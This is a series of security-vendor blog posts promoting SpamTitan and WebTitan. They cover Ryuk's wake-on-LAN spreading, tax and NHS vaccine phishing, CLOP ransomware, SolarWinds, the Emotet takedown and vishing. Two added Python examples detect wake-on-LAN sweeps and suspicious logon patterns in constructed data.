One of the most dangerous ransomware groups has updated its ransomware with worm-like capabilities that allow it to self-propagate to other devices on the local network.
Ryuk ransomware first appeared in the summer of 2018 and has evolved into one of the most serious ransomware strains. The attacks are believed to be conducted by an Eastern European threat group known as Wizard Spider, aka UNC1878.
In 2020, Ryuk was used in attacks on large organizations and companies. While some ransomware gangs chose to spare frontline healthcare organizations, Ryuk did not; the group launched a major campaign specifically targeting the U.S. healthcare sector, attacking six U.S. hospitals in a single day in October 2020. Had security researchers not uncovered the gang's plan to attack around 400 hospitals, the campaign would have been far more damaging.
Ransomware remediation firm Coveware reported that Ryuk was the third most prolific ransomware strain of 2020, deployed in 9% of all ransomware attacks. Analysis of Bitcoin wallets linked to the gang suggests more than $150 million in ransoms has been paid to it.
Ryuk is constantly being updated. The gang was quick to adopt the double-extortion tactics pioneered by the operators of Sodinokibi and Maze ransomware: stealing data before encryption and threatening to publish or sell it if the ransom is not paid.
Ryuk was also modified to attack and encrypt the drives of remote computers. The ransomware reads the ARP table on a compromised device to obtain a list of IP and MAC addresses, then sends a wake-on-LAN packet to each of those devices to power them up so they can be encrypted.
The latest update was first observed by the French national cybersecurity agency ANSSI during an incident response engagement in January. ANSSI found that the new variant has worm-like capabilities that let it spread automatically to every device in the Windows domain: any reachable host on which Windows RPC is accessible can be attacked and encrypted.
Ryuk is human-operated ransomware, but the new update greatly reduces the manual work required. That lets the group carry out more attacks and shortens the time from initial infection to encryption, leaving security teams even less time to detect and contain an attack in progress.
Although various methods are used for initial access, Ryuk is usually delivered by a malware dropper such as Emotet, TrickBot, Zloader, Qakbot, Buer Loader or Bazar Loader, and those droppers are distributed via phishing and spear-phishing emails. Approximately 80% of Ryuk attacks use phishing email as the initial attack vector.
Once a device has been compromised it is often too late to detect and stop the attack before data is stolen and files are encrypted, especially since attacks typically take place overnight and at weekends when IT teams are thin on the ground. The best defense is to block the initial attack vector: the phishing emails that distribute the malware droppers.
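The wake-on-LAN behaviour above is something a network sensor can look for. As an added example (not part of the original article and not Ryuk's or any vendor's code), the block below parses wake-on-LAN "magic packets" from UDP payloads and flags a single source that wakes many distinct hosts in a short window, which is what an ARP-table sweep looks like and what a patch server waking two or three machines does not. The magic-packet format (six 0xFF bytes, then the target MAC repeated sixteen times, optionally followed by a 4- or 6-byte SecureOn password) is the standard one; the capture data, IP addresses and thresholds are constructed for the example and would need tuning for a real network.

```python
"""Parse wake-on-LAN magic packets from UDP payloads and flag one-source wake-up bursts.
Added example; packet data is constructed, not a real capture."""
from __future__ import annotations

from collections import defaultdict

MAGIC_PREFIX = b"\xff" * 6
BODY_LEN = 6 + 6 * 16  # sync stream plus the MAC repeated 16 times


def build_magic_packet(mac: str, secureon: bytes = b"") -> bytes:
    """Encode a WoL magic packet for 'aa:bb:cc:dd:ee:ff' (or dash-separated) with optional SecureOn password."""
    mac_bytes = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(mac_bytes) != 6:
        raise ValueError("MAC must be 6 bytes")
    if len(secureon) not in (0, 4, 6):
        raise ValueError("SecureOn password must be 4 or 6 bytes")
    return MAGIC_PREFIX + mac_bytes * 16 + secureon


def parse_magic_packet(payload: bytes) -> str | None:
    """Return the target MAC as lowercase 'aa:bb:cc:dd:ee:ff' if payload is a valid magic packet, else None."""
    if len(payload) < BODY_LEN or payload[:6] != MAGIC_PREFIX:
        return None
    mac = payload[6:12]
    if payload[6:BODY_LEN] != mac * 16:
        return None  # the MAC must repeat exactly 16 times
    if len(payload) - BODY_LEN not in (0, 4, 6):
        return None  # only a SecureOn password may follow the body
    return ":".join(f"{b:02x}" for b in mac)


def find_wol_bursts(packets, max_targets: int = 5, window_s: float = 60.0) -> dict[str, list[str]]:
    """packets: iterable of (timestamp_seconds, src_ip, udp_payload).

    Returns {src_ip: sorted target MACs} for every source that woke more than max_targets
    distinct hosts within any window_s-second window. Non-WoL payloads are ignored.
    """
    events: dict[str, list[tuple[float, str]]] = defaultdict(list)
    for ts, src, payload in packets:
        mac = parse_magic_packet(payload)
        if mac is not None:
            events[src].append((ts, mac))
    bursts: dict[str, list[str]] = {}
    for src, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):  # slide a window starting at each event
            macs = {m for t, m in evs[i:] if t - t0 <= window_s}
            if len(macs) > max_targets:
                bursts[src] = sorted(macs)
                break
    return bursts


# Constructed capture: an admin host wakes two PCs half a minute apart (benign), while a
# compromised host sweeps twelve MACs in three seconds and also emits one malformed packet.
SAMPLE_CAPTURE = (
    [(1000.0 + i * 30, "10.0.0.5", build_magic_packet(f"00:11:22:33:44:{i:02x}")) for i in range(2)]
    + [(2000.0 + i * 0.25, "10.0.0.77", build_magic_packet(f"00:11:22:33:55:{i:02x}")) for i in range(12)]
    + [(2001.0, "10.0.0.77", MAGIC_PREFIX + b"not a magic packet")]
)

if __name__ == "__main__":
    for src, macs in find_wol_bursts(SAMPLE_CAPTURE).items():
        print(f"{src} woke {len(macs)} hosts: {macs[0]} .. {macs[-1]}")
```

WoL is usually sent to UDP port 9 (sometimes 7) as a broadcast, so a sensor would feed this only those datagrams. The burst rule is what separates the sweep from routine use; a single wake-up from a management server is noise, a dozen from a user workstation in seconds is worth a page.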
Having an advanced spam filtering solution in place is crucial for preventing Ryuk ransomware attacks. By spotting and quarantining the phishing emails and blocking them from reaching inboxes, the malware droppers that deliver Ryuk will not be installed.
To prevent these attacks, think about augmenting your email security tactics with SpamTitan. SpamTitan is an award-winning email security solution that will prevent phishing emails that deliver malware downloaders.
To discover more, call the SpamTitan team or start a free trial of the solution now.
Wit the advent of tax season the arrival of the annual scams targeting tax professionals has also begun. Every year as the tax filing deadline approaches, hackers conduct scams in order to steal electronic filing identification numbers (EFINs).
In the United States, the Internal Revenue Service (IRS) allocates EFINS to tax professionals and individuals to allow them to file tax returns digitally. If hackers get hold of obtain these EFINs they can file fraudulent tax returns in victims’ names to obtain tax rebates. once in possession of an e-file number of a tax professional tax returns can be submitted for many individuals, so these scams can be very profitable.
These scams typically begin with a phishing email using a trick the someone into visiting a malicious website where they are asked to hand over information or upload documents that contain sensitive data. Alternatively, recipients are told to install software allows the hackers full control of the victim’s device.
In a lot of cases the spam emails pretend to be the IRS informing tax professionals to provide information or documents in order to stop the suspension of their account. When met with this threat, tax professionals may provide the requested details.
One of the phishing emails recently uncovered pretended to be from the IRS by using the sender name “IRS Tax E-Filing,” with the subject line “Verifying your EFIN before e-filing.” The emails looked real and required “authorized e-file originators” to reverify before filing returns through the IRS system. The emails claimed the IRS had begun using this new security measure to prevent unauthorized and fraudulent behaviour. The scammers asked for a PDF file/scan of the EFIN acceptance letter and both sides of the person’s driver’s license. Similar scams have been completed that require tax preparers’ ID numbers and e-services usernames and passwords to be handed over.
This year, along with the normal phishing emails spoofing the IRS, campaigns have been discovered where the hackers claim to be prospective clients searching for tax preparers ahead of the filing deadline. Attachments are provided of the kind that would normally be required by tax preparers, but they are laced with malicious scripts that download keylogging malware that records and exfiltrates keystrokes, which are likely to include usernames and passwords.
Tax professionals that fall victim to these scams can suffer catastrophic damage to their reputation, so it is crucial to use caution when opening any emails and to stop and think carefully before handing over sensitive information or downloading files or software.
One of the simplest ways to safeguard from these scams is to put in place an advanced spam filtering solution that can identify and block these dangerous messages. SpamTitan is a powerful email security solution that identifies and prevents malware and documents containing malicious scripts with dual antivirus engines, sandboxing, and machine learning methods. Along with blocking malware threats, SpamTitan is excellent for blocking phishing emails containing malicious URLs.
The award-winning spam filter is simple and straightforward to configure and manage, requiring no technical know-how. For more details about SpamTitan, call the SpamTitan team now.
In the United Kingdom a previously unseen phishing campaign has been discovered targeting UK residents that impersonates the National Health Service (NHS). The scam claims to offer recipients the opportunity to register for a COVID-19 vaccination.
This is just one of many similar vaccine scams to be uncovered in recent weeks. All claim to provide access to a vaccine in order to trick the recipient into sharing private information. From the first moments that the SARS-CoV-2 virus began to be detected outside of China, hackers have been operating a wide variety of COVID-19 phishing scams. Now that the vaccine rollout is underway in the UK and worldwide, using the promise of an early vaccine as a lure is not a massive surprise.
In the most recent campaign, the sender’s address has been spoofed to make it look like the messages have been broadcast by the NHS, and NHS branding is included in the message. Recipients are informed that they have been chosen to receive the vaccine due to their family and medical history.
The lure appears authentic due to the fact that, in the UK, the majority of high-risk groups have already been vaccinated, and the NHS is now shifting into priority group 6, which is all those aged from 16-65 with an underlying medical condition. The NHS has also pleaded with people to remain patient and wait until they are contacted about the vaccine to arrange an appointment, which may be via email.
The NHS COVID-19 vaccine scam emails require the recipient to visit a hyperlink that brings them to a website where they are asked to hand over some information to confirm their identity. In this instance, the aim of the scam is not to steal credentials, but personal information including name, address, date of birth, and credit card information.
Phishing has become the main attack vector for many hacking collectives’ operations during the pandemic. One study points to growth of 667% in phishing as an attack vector, showing the extent to which hackers have changed their attack tactics during the pandemic. Another study, by Centrify, shows the number of phishing attacks grew by 73% between March 2020 and September 2020.
Research made available by the ransomware response firm Coveware indicates that the number of ransomware attacks using phishing as the infection vector increased sharply in the final quarter of 2020, overtaking all other types of attack to become the main method of gaining access to business databases.
It is predicted that phishing attacks will go on rising during 2021 due to the ease with which campaigns can be run and their effectiveness. Attacks are also becoming more sophisticated and harder for individuals to spot.
Spear phishing attacks that focus on specific companies and individuals are becoming much more popular. These campaigns include prior research, and the messages are tailored to increase the chance of a response.
With phishing so common, it is crucial for companies to see to it that they are properly safeguarded and have an email security solution in place that is capable of blocking these attacks.
Dual AV engines and sandboxing can prevent known and zero-day malware and ransomware threats, while machine learning technology and multiple threat intelligence feeds provide protection against current and emerging phishing campaigns.
SpamTitan greatly enhances protection for Microsoft Office 365 accounts, whose login details are highly sought after by phishers, and offers companies excellent security against all email-based attacks at a very affordable cost.
If you wish to safeguard your inboxes and prevent more malicious emails, get in touch with TitanHQ for further details about SpamTitan.
TitanHQ’s powerful yet easy-to-use cybersecurity solutions have been recognized at this year’s Expert Insights “Best-Of” Awards and have been named winners in their respective categories.
Expert Insights helps organizations make the right cybersecurity decisions with confidence by providing helpful guides, expert advice, and tailored solutions. The Expert Insights’ website receives more than 40,0000 business visitors a month looking for insights into cybersecurity solutions when researching the best products to buy.
Each year, the editorial team at Expert Insights evaluates the leading cybersecurity solutions on the market based on market position, product features, the protection provided, ease of use, and how they are rated by verified users of the products. The team includes technology experts with decades of experience in the cybersecurity industry who select the top product across a wide range of categories.
TitanHQ is thrilled to announce that the ArcTitan email archiving solution, the SpamTitan email security solution, and the WebTitan web filtering solution have all been named winners of Expert Insights’ 2021 Best-Of Awards in the Email Archiving, Email Security Gateway, and Web Security categories.
“2020 was an unprecedented year of cybersecurity challenges, with a rapid rise in remote working causing a massive acceleration in cybercrime,” said Expert Insights CEO and Founder Craig MacAlpine. “Expert Insights’ Best-Of awards are designed to recognize innovative cybersecurity providers like TitanHQ that have developed powerful solutions to keep businesses safe against increasingly sophisticated cybercrime.”
All three solutions are consistently rated highly by Managed Service Providers, enterprise users, and SMB users, and are praised for their ease of implementation, ease of use, effectiveness, and price. The products often attract 5-star reviews from verified users of the Expert Insights’ website, as well as on G2 Crowd, Capterra, Google Reviews, and GetApp.
The products are offered to customers by more than 2,500 MSPs and over 8,500 businesses in 150 countries have adopted the award-winning solutions.
“The recent pandemic and the growth of remote working initiatives have further highlighted the need for multiple layers of cybersecurity and our award-winning solutions form key pillars in this security strategy,” said Ronan Kavanagh, CEO, TitanHQ. “We will continue to innovate and provide solutions that MSPs can use to deliver a consistent, secure and reliable experience to their customers.”
Since it first emerged on the scene, the number of attacks in which CLOP ransomware has been deployed has been constantly increasing, with a major spike during October 2020.
Since that spike in the deployment of CLOP ransomware there have been many incidents involving large organizations accompanied by huge ransom demands – in one particular incident, an attack on Software AG came with a ransom demand of $20m.
Like many other ransomware groups, the CLOP ransomware gang steals data before encrypting files. If victims have a viable backup and try to recover their encrypted files without paying the ransom, the group releases the stolen data on the dark web, making it available to other hacking operations. The media are made aware of the data dumps, and the resulting coverage can cause businesses serious reputational harm. In recent months there have been many class action lawsuits reported after ransomware attacks in which stolen data was leaked over the Internet.
CLOP ransomware is thought to be operated by a ransomware group called FIN11, which is an offshoot of a prolific Russian cybercriminal group called TA505. FIN11 has targeted many different sectors, although recently production, health and retail have been concentrated on. When attacks are launched on groups and businesses in these sectors, the losses from downtime can be significant, which increases the chances of victims paying the ransom.
Many ransomware groups have focused on flaws in Remote Desktop Protocol, VPN solutions, and weaknesses in software and operating systems to obtain the access they need to internal networks to deploy ransomware. However, the initial attack vector in CLOP ransomware attacks (and also many other ransomware strains) is spam email. Large scale spam campaigns are carried out, often focusing on certain industry sectors or geographical locations. These are called “spray and pray” campaigns. The hope is to obtain access to as many networks as possible. The ransomware gang can then select which businesses are worth attacking with ransomware.
Once CLOP ransomware is downloaded, detection can be tricky as the threat group has programmed the ransomware to turn off antivirus software such as Microsoft Security Essentials and Windows Defender. The key to preventing attacks is to stop the initial infection, which means stopping the spam emails from reaching inboxes where they can be opened by staff.
Preventing the attacks can be done by using an advanced spam filtering solution with robust antivirus protection. SpamTitan, for example, uses dual antivirus engines to catch known malware strains and sandboxing to spot dangerous files including previously unknown malware, ransomware, or malicious scripts. Machine learning processes are also used to spot new threats in real time.
The spam emails used in these campaigns try to steal details such as Office 365 logins and passwords or get users to install malware downloaders. Extra protection against this phase of the attack can be supplied by a web filter such as WebTitan. WebTitan prevents the phishing component of these attacks by stopping these malicious URLs from being accessed by employees, as well as preventing downloads of malware from the Internet.
Employee training is also crucial for helping employees spot phishing emails, and multi-factor authentication should be turned on to stop stolen credentials from being used to access email accounts and cloud apps.
If you want to enhance your security measures in the face of ransomware, malware and phishing campaigns, call the TitanHQ team now for a SpamTitan and WebTitan free trial.
Email account compromises occur many times around the world every day, and it is estimated that 2.5 billion accounts were hacked during 2019, which equates to 6.85 million accounts being hacked every day.
Cybercriminals are always searching for high value accounts that have access to high value assets, and taking over an email account is the first step in compromising a database. A perfect recent example is the compromise of staff email accounts at the U.S. Treasury Department last December. The seizure of privileged user accounts was not the result of a typical credential stuffing attack. It was actually the result of a sophisticated software supply chain attack. An official statement shared by Senate Finance Committee ranking member, Ron Wyden said: “Hackers broke into systems in the Departmental Offices division of Treasury, home to the department’s highest-ranking officials.”
These hacking attempts were part of the highly publicized SolarWinds attack, in which foreign hackers, most likely funded by the Russian government in some manner, exploited a weakness in the SolarWinds Orion monitoring and management software. This permitted the hackers to sign in without having to guess usernames and passwords. As a result, the hackers could impersonate users and operate freely within the compromised organizations. Sadly, no one knows for sure what data was taken or the full range of actions carried out by the cybercriminals involved. Microsoft has revealed that it addressed the flaw exploited in the attack. Unfortunately, the hackers may have compromised as many as 18,000 government and private networks, possibly seizing user IDs, passwords, financial records, source code and other sensitive or high value data.
Email accounts are one of the weak points that hackers often focus on. In the same way that hackers leveraged the SolarWinds exploit to potentially break into thousands of networks, a single compromised email account can have compounding consequences, because a single email address is connected to other user accounts, giving hackers access to other valuable databases.
As politicians, regulators, cybersecurity experts and software developers try to figure out what could have been done to mitigate this attack, it is clear that there is no simple answer. Supply chain attacks are tricky to defend against since you are depending on the software vendor to safeguard their source code and platforms. In this instance, the usual recommendations would not have done anything to stop this attack.
- Groups are told to only download signed software versions, but the involved software in this incident was signed.
- Updating to the most recent software version would not have made any difference in this instance because it was the latest software version that was infiltrated.
- The attack was carried out in a highly concealed and stealthy manner and would have been undetectable by everyday monitoring tactics.
The ease with which highly privileged user accounts within the United States government were accessed should be a wake-up call to all businesses. In today’s highly connected and digital world, a zero-trust security strategy must be put in place.
Last year saw twice as many phishing attacks as 2019, with the majority of organizations being tricked into transferring large ransoms in order to retrieve their data or to prevent private information from being shared publicly or sold to other hacking groups.
At the beginning of 2020, exfiltrating data before the deployment of ransomware was still only being carried out by a minority of ransomware gangs, but that trend changed as the year progressed. By December around 17 hacking groups were using this double extortion process and were stealing sensitive data before encrypting files. Many attacked organizations had no option other than to pay the ransom in order to deal with the threat of publication of sensitive data.
The scale of ransomware attacks in 2020 has been emphasised by various studies by cybersecurity experts over the past few weeks. Chainalysis recently released a report that suggests more than $350 million was transferred to cybercriminals in 2020 alone, based on a review of the transactions to blockchain addresses known to be used by ransomware threat groups. Obviously that figure is likely to be much lower than the true total, as many businesses do not disclose that they have suffered ransomware attacks. To put that figure in context, a similar review in 2019 estimated the losses to be around $90 million. Those figures are for ransom payments alone, not the cost of addressing attacks, which would be many orders of magnitude higher.
The rise in attacks can be partly put down to the change in working practices due to the pandemic. Many businesses changed from office-based working to a distributed remote workforce to prevent the spread of COVID-19 and keep their employees safe. The swift change involved hastily implementing remote access solutions to support those workers, which introduced flaws that were readily exploited by ransomware groups.
Measures to Take to Prevent Ransomware Attacks
What all companies and groups need to do is to make it as difficult as possible for the attacks to hit their targets. While there is no one solution for preventing ransomware attacks, there are measures that can be taken that make it much harder for the attacks to bear fruit.
With the majority of ransomware attacks now beginning with a phishing email, an advanced email security solution is crucial. By using best-in-market solutions like SpamTitan to proactively secure the Office 365 environment it is much easier to block threats than by simply depending on Office 365 anti-spam protections, which are commonly bypassed to deliver Trojans and ransomware.
A web filtering solution can prevent ransomware from being delivered to your systems. Multi-factor authentication must be put in place for email accounts and cloud apps, workers should be educated in how to spot threats, and monitoring systems should be enabled to allow active attacks to be discovered and addressed before ransomware is launched.
During the COVID-19 pandemic there have been many new possible attack vectors for hackers to target due to the changes required of workplaces in the face of national lockdowns.
This resulted in a more dispersed, remote workforce. Reacting to this, hackers increased their phishing attacks to try to steal login details for email accounts, VPNs, and remote access solutions.
The rise in cybercriminal campaigns was recently shown by the Anti-Phishing Working Group, which has been compiling data on phishing attacks from its member groups during 2020. Its most recent report shows phishing attacks more than doubled over the course of 2020, peaking in October 2020 when previous records were broken. In October, 225,304 new phishing sites were detected, compared with under 100,000 during January 2020. During the period from August to December 2020, over 200,000 new phishing sites were discovered every month.
Links to these phishing portals are shared in large scale phishing campaigns, and the majority of the messages arrive in inboxes where the links are then clicked. The pandemic made it much simpler for hackers to successfully target those seeking information about COVID-19. As the year went on, COVID-19 themed lures were deployed masquerading as information about COVID-19 relief payments for businesses, offers of early vaccines, small business loans, tax deadline extensions, and similar topics.
Hackers often use compromised websites for hosting their phishing forms, but it is now much more typical for hackers to purchase their own domains tailored to each phishing campaign. These lookalike domains can easily trick people into thinking they are on a genuine website.
Hackers have also been using encryption to mask their phishing URLs and fool employees. Hosting phishing URLs on HTTPS sites can trick staff into thinking the web content is authentic, and many security solutions do not inspect encrypted content, which makes the URLs tricky to spot and block. In Q4 2020, 84% of phishing URLs used SSL encryption.
The rise in the use of SSL encryption is a worry, as many people mistakenly believe that a URL beginning with HTTPS is safe when that is not so. SSL encryption means the link between the browser and the website is secure, which means users are safeguarded against the interception of sensitive information, but a hacker may own or control that website. The secure connection just means other hackers will not be able to intercept login credentials as they are entered on a phishing web portal.
The issue for companies has been how to address these attacks as they increase in number and complexity. Many companies have previously depended on Office 365 anti-spam protections for preventing spam and phishing threats, but large numbers of these malicious emails are delivered to Office 365 inboxes. When that happens and a malicious link is visited, they have no way of stopping employees from disclosing sensitive data.
One way businesses can better safeguard their databases from these phishing attacks is by putting in place a web filtering solution that features SSL inspection. WebTitan has the ability to decrypt web traffic, inspect the content, and then re-encrypt it, which means phishing websites are not hidden and can be identified and blocked.
WebTitan also uses a range of threat intelligence feeds to see to it that once a phishing URL is discovered, all WebTitan users are instantly protected. WebTitan makes sure that protection is in place against emerging phishing URLs and zero-minute attacks. When combined with an advanced spam filtering solution like SpamTitan to block phishing emails at source and ensure they do not land in inboxes, companies will be well protected from phishing attacks.
The business world has been hit very hard during 2020 by the COVID-19 pandemic, resulting in massive complications as most businesses try simply to survive as competitive entities. Complicating this even further has been the increase in ransomware attacks, as cybercriminals sought to use the pandemic as leverage in their bid to steal money from anywhere possible.
Ransomware is not a new phenomenon and was first witnessed inflicting damage during the early 2000s in order to steal money from individuals and companies. It became more widespread during the 2010s and it is now the biggest cyber threat for businesses.
According to data from Kroll, during the third quarter of 2020, ransomware attacks grew by 40% with around 200 million attacks taking place during that time. Additionally a recent H1 2020 Cyber Insurance Claims Report released by Coalition states that 87% of all cyber-related insurance claims are filed due to ransomware attacks.
Another trend is that hackers are seeking larger sums of money to release the data they have encrypted, according to a report from Coveware, a firm that assists companies recovering from ransomware attacks. It says that ransom demands grew by 200% during Q4 2019, and that growth continued during 2020.
Ransomware gangs have developed a new tactic of stealing data prior to encrypting files in order to apply double extortion. So even if a company pays to recover data, victims still have to hand over money to stop the public release of their stolen data. The healthcare industry was hit particularly hard during the last 12 months, as healthcare systems and hospitals had to fight the pandemic at the same time as a huge increase in attacks on hospitals was recorded.
The pandemic has given ransomware gangs new opportunities to carry out campaigns targeting remote workers, with new vulnerabilities identified to exploit. COVID-19 has also been used in lures that deliver ransomware, first claiming to offer new advice on the virus, then possible cures, and latterly vaccine-related lures.
The huge rise in attacks at the back end of 2020 indicates that they will continue to rise during 2021, and there is nothing to suggest otherwise. These types of attack are likely to persist as long as they continue to be profitable so companies must take care to do everything possible to prevent all attacks.
Some of the most crucial measures to implement include:
- Configure a proven spam filter with the strongest protection against malware and ransomware. Make sure it uses signature-based detection to block known ransomware variants and sandboxing to identify new ransomware strains.
- Ensure patches are applied promptly and software is updated quickly to the most recent version.
- Show your employees how to spot ransomware and malware emails and conduct general security training.
- Configure a web filtering solution to prevent access to risky and malicious websites to stop installations of ransomware.
- Insist on the creation of strong passwords to obstruct brute force attacks.
- Turn on multi-factor authentication wherever it is available.
If you can spot unauthorized access to your databases as it occurs, you may be able to stop an attack before ransomware is deployed. Most hackers spend time moving laterally to identify as many devices as possible before launching an attack, and they will try to find and steal data, which gives you a window to detect and block the attack. You should have a monitoring system in place that raises alerts when suspicious activity is spotted and, ideally, one that can automatically remediate attacks when they are discovered. Many attacks take place at weekends and on public holidays when monitoring by IT teams is likely to be reduced, so think about the mechanisms you have in place when staffing levels are minimal.
You may not be able to prevent an attack, but you can prepare your team(s) and limit the damage inflicted. First and foremost, back up your data. Store the backup in a location that cannot be accessed from the network where the data is held, keep a copy of the backup on a non-networked device, and ensure backups are carried out regularly and tested to make sure data can be restored.
You should also set up a disaster recovery plan that can go live as soon as an attack takes place to ensure your company can go on working until the attack is addressed.
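Two of the signals mentioned in the monitoring advice above, activity at weekends or outside business hours and an account fanning out across many hosts during lateral movement, are simple to express as rules. The Python script below is an added example rather than anything from TitanHQ or a specific monitoring product; it parses a handful of constructed authentication log lines, flags successful logons outside an assumed 08:00 to 18:00 UTC weekday window, and flags any account that logs on to four or more distinct hosts within ten minutes. The log format, hostnames, usernames, addresses and thresholds are all assumed for the example:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Assumed log format, one authentication event per line (constructed).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) "
    r"event=(?P<event>\S+) result=(?P<result>\S+) src=(?P<src>\S+)$"
)

# Assumed policy: business hours 08:00-18:00 UTC on weekdays; four distinct
# hosts within ten minutes counts as lateral-movement style fan-out.
BUSINESS_START, BUSINESS_END = 8, 18
FANOUT_HOSTS, FANOUT_WINDOW = 4, timedelta(minutes=10)

# Constructed sample log: normal weekday logons, then one account (jsmith)
# hopping across five hosts at 02:00 on a Saturday after a failed attempt.
SAMPLE_LOG = """\
2021-02-12T09:05:11Z host=WS-101 user=jsmith event=logon result=success src=10.0.5.23
2021-02-12T09:40:02Z host=WS-102 user=mlee event=logon result=success src=10.0.5.40
2021-02-13T02:13:50Z host=FS01 user=jsmith event=logon result=failure src=10.0.9.9
2021-02-13T02:14:07Z host=FS01 user=jsmith event=logon result=success src=10.0.9.9
2021-02-13T02:15:30Z host=DC01 user=jsmith event=logon result=success src=10.0.9.9
2021-02-13T02:16:44Z host=SQL01 user=jsmith event=logon result=success src=10.0.9.9
2021-02-13T02:18:02Z host=WS-117 user=jsmith event=logon result=success src=10.0.9.9
2021-02-13T02:19:10Z host=HR-APP user=jsmith event=logon result=success src=10.0.9.9
2021-02-15T08:30:00Z host=WS-101 user=jsmith event=logon result=success src=10.0.5.23
"""


def parse_line(line):
    """Parse one log line into a dict, or return None for unrecognised lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return rec


def successful_logons(records):
    return [r for r in records if r["event"] == "logon" and r["result"] == "success"]


def off_hours(ts):
    """True at weekends (Saturday=5, Sunday=6) or outside business hours."""
    return ts.weekday() >= 5 or not (BUSINESS_START <= ts.hour < BUSINESS_END)


def detect_off_hours(records):
    return [
        {"rule": "off-hours-logon", "user": r["user"], "host": r["host"], "ts": r["ts"].isoformat()}
        for r in successful_logons(records)
        if off_hours(r["ts"])
    ]


def detect_fanout(records):
    """Sliding window per user: report the largest set of distinct hosts seen
    within FANOUT_WINDOW if it reaches FANOUT_HOSTS."""
    by_user = defaultdict(list)
    for r in successful_logons(records):
        by_user[r["user"]].append(r)
    alerts = []
    for user, recs in by_user.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = set(), 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > FANOUT_WINDOW:
                start += 1
            hosts = {r["host"] for r in recs[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= FANOUT_HOSTS:
            alerts.append({"rule": "logon-fanout", "user": user, "hosts": sorted(best)})
    return alerts


def analyse(log_text):
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    return {"off_hours": detect_off_hours(records), "fanout": detect_fanout(records)}


if __name__ == "__main__":
    for rule, alerts in analyse(SAMPLE_LOG).items():
        for a in alerts:
            print(rule, a)
```

On the sample data the fan-out rule fires once, for jsmith across five hosts, and the off-hours rule fires for each of the five Saturday logons; the failed attempt is ignored by both rules. In a real deployment the thresholds would be tuned per account type, since scheduled service accounts legitimately work at night, and the same sliding-window structure can be reused for failure bursts or new source addresses.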
Used in extensive attacks on companies globally for some time, the Emotet botnet has finally been taken down as part of a coordinated effort involving Europol, the FBI, the UK National Crime Agency, and other law enforcement bodies.
The cybercriminals managing Emotet used their malware to set up a backdoor to many different company databases and then sold access to other hacking groups that aimed to carry out additional malicious attacks that involved stealing sensitive data and extortion through the deployment of ransomware.
The operation has been in development for around two years and was set up so that the multi-country infrastructure could be disrupted simultaneously, preventing the threat group from re-establishing the network in future. Law enforcement bodies have taken control of hundreds of servers and of the complete Emotet infrastructure, in what will be viewed by many as one of the most important malware takedowns to date. The takedown has stopped the Emotet gang from using the malware and has led to the loss of control of the army of compromised devices that comprise the botnet.
Europol and its partners were able to map the entire infrastructure, take control of the network, and shut down the Emotet Trojan. A software update was installed on the main servers used to manage the malware, two of which were located in the Netherlands. Infected computer systems will download the update, which results in the Emotet Trojan being quarantined.
Emotet is possibly the most dangerous malware of recent years and the botnet used to share it is one of the best available. Approximately 30% of all malware attacks in 2020 involved the Emotet Trojan.
Phishing emails were used to deliver the Emotet Trojan. Large phishing campaigns were run using a wide variety of lures to trick recipients into opening malicious attachments or visiting websites that installed the Emotet Trojan. The lures deployed in the campaigns frequently changed, taking advantage of world events to increase the probability of the attachments being opened.
Emotet began life as a banking Trojan but later evolved into a malware dropper. Emotet delivered other banking Trojans such as TrickBot as a secondary payload, as well as ransomware strains such as Ryuk.
Devices infected with Emotet are added to the botnet and used to send copies of the Emotet Trojan to other devices on the network and to the user’s contacts by taking over the user’s email account. Infecting just one device on a company network could quickly lead to more infections. The Trojan was also very difficult to remove, as removal of the infection would only be temporary, with other devices on the network simply re-infecting the cleaned device.
Prior to the 2020 Presidential election in the United States, Microsoft and its partners were able to take over management of some of the infrastructure used to control and share the TrickBot Trojan. In that instance the operation was only temporarily successful, as the TrickBot gang was able to rapidly recover and bring its infrastructure back online.
Hackers use many tactics to steal credentials that they then use to remotely log onto corporate accounts and cloud services and obtain access to business databases. Phishing is the most common method, and it is most often carried out over email.
Hackers design emails using a range of tricks to fool the recipient into visiting a malicious website where they must hand over credentials that are recorded and used by the hackers to remotely access the accounts.
Companies are now realizing the advantages of configuring an advanced spam filtering solution to prevent these phishing emails at source and ensure they do not land in inboxes. Advanced anti-spam and anti-phishing solutions will prevent practically all phishing attacks, so if you have yet to put in place such a solution or you are depending on Microsoft Office 365 protections, we urge you to get in touch and give SpamTitan a trial.
Phishing is not only carried out using email. Rather than using email to share the hook, many threat collectives use SMS or instant messaging services and increasing numbers of phishing campaigns are now being managed by telephone and these types of phishing attack are harder to prevent.
When phishing takes place via SMS messages it is known as Smishing. Instead of email, an SMS message is shared with a link that users are instructed to visit. Instant messaging platforms like WhatsApp are also used. A range of lures are in play, but it is typical for security alerts to be shared that warn the recipient about a fraudulent transaction or other security threat that depends on them them logging in to their account.
In December 2019, the U.S. Federal Bureau of Investigation (FBI) discovered a campaign where hackers were carrying out phishing campaigns using telephones – called vishing. Since then, the number of instances of vishing attacks has grown, leading to the FBI and the Cybersecurity and Infrastructure Security Agency to release a joint alert in the summer about a campaign aiming for remote workers. This month, the FBI has released another alert following a spike in vishing attacks on companies.
Hackers often target users with high levels of privileges, but not always. There has been an increasing trend for hackers to target every credential, so all users are in danger. Once one set of credentials is captured, efforts focus on elevating privileges, and reconnaissance is carried out to identify targets in the company with the level of permissions the attackers need, i.e. permissions to perform email updates.
The hackers make VoIP calls to workers and convince them to visit a web page where they need to log in. In one attack, a staff member of the firm was identified in the company’s chatroom, then contacted and convinced to log in to their group’s VPN on a fake VPN page. The credentials were obtained and used to carry out reconnaissance.
How to Deal with Smishing and Vishing
Dealing with these types of phishing attacks requires a range of processes. As opposed to email phishing, these threats cannot be easily stopped at source. It is therefore crucial to cover these threats in security awareness training classes as well as warning about the dangers of email phishing.
